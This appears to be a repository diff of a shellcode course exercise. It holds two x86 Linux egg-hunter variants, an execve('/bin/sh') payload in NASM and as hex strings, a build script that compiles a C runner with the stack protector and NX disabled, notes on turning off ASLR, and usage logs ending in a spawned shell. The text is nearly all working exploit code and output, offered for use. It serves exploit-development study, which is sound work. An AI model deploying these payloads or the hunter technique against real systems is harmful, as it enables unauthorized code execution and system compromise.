unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
unsigned char garbage2[] = "And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
}

11
exam3/access/NOTES Normal file
View File

@ -0,0 +1,11 @@
NOTES
no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
execstack: disables Executable space protection (NX).
Or Data Execution Prevention (DEP) on Windows,
or Write XOR Execute (W^X) on BSD.
CPUs NX bit ("Never eXecute").
To disalbe Address Space Layout Randomization (ASLR) when running binary
setarch `arch` -R ./program

27
exam3/access/USAGE Normal file
View File

@ -0,0 +1,27 @@
USAGE
1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
access$ ./make.sh "MyEgg123"
[I] Using custom EGG mark: MyEgg123
[+] Compiling payload.nasm ...
[+] Compiling hunter.nasm ...
[+] Extracting PAYLOAD code from payload ...
[+] Adding EGG mark to PAYLOAD ...
[+] Checking PAYLOAD code for NULLs ...
[+] Extracting HUNTER code from hunter ...
[+] Checking HUNTER code for NULLs ...
[+] Compiling shellcode.c ...
-rwx------. 1 arno arno 5132 Mar 28 00:22 ./shellcode
[+] All done!
3. Run the shellcode
access$ ./shellcode
Hunter Length: 44
Payload Length: 36
sh-4.1$

59
exam3/access/hunter.nasm Normal file
View File

@ -0,0 +1,59 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
;
;
; Filename: hunter.nasm *access modification
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
;
;
section .data
egg1 equ "Egg-" ; DWORD Egg marker part1
egg2 equ "Mark" ; DWORD Egg marker part2
section .text
global _start
_start:
xor edx, edx ; Searching the whole memory
; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
nextPage:
or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
nextAddr:
inc edx ; Searching forward
; Checking if memory is accessible
push byte +0x21 ; 0x21 = 33 = __NR_access
pop eax ; EAX points to 0x21
lea ebx, [edx+0x8] ; next address to check
xor ecx, ecx ; 0: mode = F_OK
int 0x80
cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
jz nextPage
; Searching for the Egg marker (in current page of memory which is accessible)
cmp dword [edx], egg1
jne nextAddr
cmp dword [edx+0x4], egg2
jne nextAddr
lea ecx, [edx+0x8]
jmp ecx

130
exam3/access/make.sh Executable file
View File

@ -0,0 +1,130 @@
#!/usr/bin/env sh
#
# USAGE
# ./make.sh [Egg-Mark]
#
# NOTE
# Egg-Mark must be a plaintext with 8 bytes in length
# If Egg-Mark was not specified, the default one will be used.
#
# To specify a custom payload, simply modify the code of payload.nasm file.
# Alternativly, you can modify PAYLOADCODE= variable down below the code.
#
ARG1=$1
if [ -z "$ARG1" ]; then
echo " [I] Argument not specified. Using default EGG mark."
ARG1="Egg-Mark";
elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
exit 1;
else
echo " [I] Using custom EGG mark: "$ARG1
fi
DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
EGGMARK=$ARG1
NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
# Uncomment to save EGGMARK in HEX
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
# Cleanup
rm -f shellcode payload.o payload hunter.o hunter
echo " [+] Compiling payload.nasm ..."
nasm -f elf32 -o payload.o payload.nasm
ld -m elf_i386 -o payload payload.o
echo " [+] Compiling hunter.nasm ..."
nasm -f elf32 -o hunter.o hunter.nasm
ld -m elf_i386 -o hunter hunter.o
echo " [+] Extracting PAYLOAD code from payload ..."
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
echo " [+] Adding EGG mark to PAYLOAD ..."
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
echo " [+] Checking PAYLOAD code for NULLs ..."
if [[ $FULL_PAYLOADCODE == *00* ]]; then
echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
exit 1
fi
echo " [+] Extracting HUNTER code from hunter ..."
HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
# For debugging only
#echo ${DEFAULTEGG[0]}
#echo ${DEFAULTEGG[1]}
#echo ${NEWEGG[0]}
#echo ${NEWEGG[1]}
# Preparing Default egg to HEX form in order to replace it with a New egg
DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in HEX format
NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in Plaintext format
#NEWEGG1=$(echo -n ${NEWEGG[0]})
#NEWEGG2=$(echo -n ${NEWEGG[1]})
FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
echo " [+] Checking HUNTER code for NULLs ..."
if [[ $FULL_HUNTERCODE == *00* ]]; then
echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
exit 1
fi
# Uncomment to see what will is replaced (default egg with a new one)
#echo $DEFEGG1
#echo $DEFEGG2
#echo $NEWEGG1
#echo $NEWEGG2
#echo $HUNTERCODE
#echo $FULL_HUNTERCODE
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = \
$FULL_HUNTERCODE;
unsigned char garbage1[] = \
"Just some garbage here...";
unsigned char payload[] = \
$FULL_PAYLOADCODE;
unsigned char garbage2[] = \
"And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
}
EOF
echo " [+] Compiling shellcode.c ..."
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
# Cleanup
rm -f payload.o payload hunter.o hunter
ls -la ./shellcode
echo " [+] All done!"

44
exam3/access/payload.nasm Normal file
View File

@ -0,0 +1,44 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
; Filename: payload-execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
global _start
section .text
_start:
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80

18
exam3/access/shellcode.c Normal file
View File

@ -0,0 +1,18 @@
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xec\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1";
unsigned char garbage1[] = "Just some garbage here...";
unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
unsigned char garbage2[] = "And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
}

11
exam3/basic/NOTES Normal file
View File

@ -0,0 +1,11 @@
NOTES
no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
execstack: disables Executable space protection (NX).
Or Data Execution Prevention (DEP) on Windows,
or Write XOR Execute (W^X) on BSD.
CPUs NX bit ("Never eXecute").
To disalbe Address Space Layout Randomization (ASLR) when running binary
setarch `arch` -R ./program

27
exam3/basic/USAGE Normal file
View File

@ -0,0 +1,27 @@
USAGE
1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
basic$ ./make.sh "egg.MaRk"
[I] Using custom EGG mark: egg.MaRk
[+] Compiling payload.nasm ...
[+] Compiling hunter.nasm ...
[+] Extracting PAYLOAD code from payload ...
[+] Adding EGG mark to PAYLOAD ...
[+] Checking PAYLOAD code for NULLs ...
[+] Extracting HUNTER code from hunter ...
[+] Checking HUNTER code for NULLs ...
[+] Compiling shellcode.c ...
-rwx------. 1 arno arno 5100 Mar 28 13:17 ./shellcode
[+] All done!
3. Run the shellcode
basic$ ./shellcode
Hunter Length: 21
Payload Length: 36
sh-4.1$ exit

40
exam3/basic/hunter.nasm Normal file
View File

@ -0,0 +1,40 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
;
;
; Filename: hunter.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
;
;
section .data
egg1 equ "Egg-" ; DWORD Egg marker part1
egg2 equ "Mark" ; DWORD Egg marker part2
section .text
global _start
_start:
; Searching for the Egg marker
next:
inc eax ; Searching forward (can also try dec eax)
isEgg:
cmp dword [eax-8], egg1 ; Checking if we can see egg1
jne next ; If not, continuing to search
cmp dword [eax-4], egg2
jne next
call eax ; Once found, we call our payload

130
exam3/basic/make.sh Executable file
View File

@ -0,0 +1,130 @@
#!/usr/bin/env sh
#
# USAGE
# ./make.sh [Egg-Mark]
#
# NOTE
# Egg-Mark must be a plaintext with 8 bytes in length
# If Egg-Mark was not specified, the default one will be used.
#
# To specify a custom payload, simply modify the code of payload.nasm file.
# Alternativly, you can modify PAYLOADCODE= variable down below the code.
#
ARG1=$1
if [ -z "$ARG1" ]; then
echo " [I] Argument not specified. Using default EGG mark."
ARG1="Egg-Mark";
elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
exit 1;
else
echo " [I] Using custom EGG mark: "$ARG1
fi
DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
EGGMARK=$ARG1
NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
# Uncomment to save EGGMARK in HEX
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
# Cleanup
rm -f shellcode payload.o payload hunter.o hunter
echo " [+] Compiling payload.nasm ..."
nasm -f elf32 -o payload.o payload.nasm
ld -m elf_i386 -o payload payload.o
echo " [+] Compiling hunter.nasm ..."
nasm -f elf32 -o hunter.o hunter.nasm
ld -m elf_i386 -o hunter hunter.o
echo " [+] Extracting PAYLOAD code from payload ..."
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
echo " [+] Adding EGG mark to PAYLOAD ..."
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
echo " [+] Checking PAYLOAD code for NULLs ..."
if [[ $FULL_PAYLOADCODE == *00* ]]; then
echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
exit 1
fi
echo " [+] Extracting HUNTER code from hunter ..."
HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
# For debugging only
#echo ${DEFAULTEGG[0]}
#echo ${DEFAULTEGG[1]}
#echo ${NEWEGG[0]}
#echo ${NEWEGG[1]}
# Preparing Default egg to HEX form in order to replace it with a New egg
DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in HEX format
NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
# Uncomment to save new EGGMARK in Plaintext format
#NEWEGG1=$(echo -n ${NEWEGG[0]})
#NEWEGG2=$(echo -n ${NEWEGG[1]})
FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
echo " [+] Checking HUNTER code for NULLs ..."
if [[ $FULL_HUNTERCODE == *00* ]]; then
echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
exit 1
fi
# Uncomment to see what will is replaced (default egg with a new one)
#echo $DEFEGG1
#echo $DEFEGG2
#echo $NEWEGG1
#echo $NEWEGG2
#echo $HUNTERCODE
#echo $FULL_HUNTERCODE
cat > shellcode.c << EOF
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = \
$FULL_HUNTERCODE;
unsigned char garbage1[] = \
"Just some garbage here...";
unsigned char payload[] = \
$FULL_PAYLOADCODE;
unsigned char garbage2[] = \
"And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
}
EOF
echo " [+] Compiling shellcode.c ..."
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
# Cleanup
rm -f payload.o payload hunter.o hunter
ls -la ./shellcode
echo " [+] All done!"

44
exam3/basic/payload.nasm Normal file
View File

@ -0,0 +1,44 @@
; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see <http://www.gnu.org/licenses/>.
; Filename: payload-execve-stack.nasm
; Author: Andrey Arapov <andrey.arapov@gmail.com>
; 2013 March
global _start
section .text
_start:
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80

BIN
exam3/basic/shellcode Executable file
View File

Binary file not shown.

18
exam3/basic/shellcode.c Normal file
View File

@ -0,0 +1,18 @@
#include <stdio.h>
#include <string.h>
unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
unsigned char garbage1[] = "Just some garbage here...";
unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
unsigned char garbage2[] = "And some garbage there...";
main()
{
printf("Hunter Length: %d\n", strlen(hunter));
printf("Payload Length: %d\n", strlen(payload));
int (*ret)() = (int(*)())hunter;
ret();
}